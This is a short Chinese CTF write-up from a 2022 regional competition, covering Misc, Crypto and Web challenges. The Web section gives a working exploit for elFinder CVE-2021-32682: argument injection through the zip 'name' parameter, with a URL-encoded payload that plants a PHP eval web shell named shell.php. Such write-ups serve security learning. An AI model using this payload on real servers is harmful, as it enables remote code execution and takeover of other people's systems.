【WP】2022强国杯南部赛区决赛(PART)

【WP】2022强国杯南部赛区决赛(PART)

十月 23, 2022

Misc

空白文件

一个文档,拉进010editor

image-20221023183857197

image-20221023184037728

迷惑的时间

一个四个图片一个 php

image-20221023184308017

flag.php有一个hint: love

image-20221023184627967

有一个压缩包,有密码上爆破

image-20221023184815562

image-20221023184849178

Crypto

超级简单的解密

压缩包有密码,不是伪加密上爆破

手机九键密码 转小写就是flag

image-20221023185045214

Web

认真阅读flag

  • flag.php:读出一个假flag

  • hint.txt

  • exec.php过滤绕过直接读出flag

    payload:

Create_files

elFinder版本 <= 2.1.58 存在高危漏洞 CVE-2021-32682

创建一个空白txt文本,进行多次压缩,抓包可以获取嵌套文件的base64编码

  • 虽然中间对参数进行了正则和替换的过滤操作,但是因为程序会将name参数值解析为标志(--foo=bar),可以通过zip-TT指定要运行的测试命令

  • 在传参name处注入木马生成shell.php文件

  • payload

1
-TvTT=[命令]>shell.php%20%23%20a.zip

对注入一句话命令echo '<?php @eval($_POST[a]);?>'进行编码后注入

  • 最终payload:
1
-TvTT=%65%63%68%6f%20%27%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%61%5d%29%3b%3f%3e%27>shell.php%20%23%20a.zip

注入成功可以看到生成了一个shell.php,点击下载,发现木马写入成功

连上木马,获取flag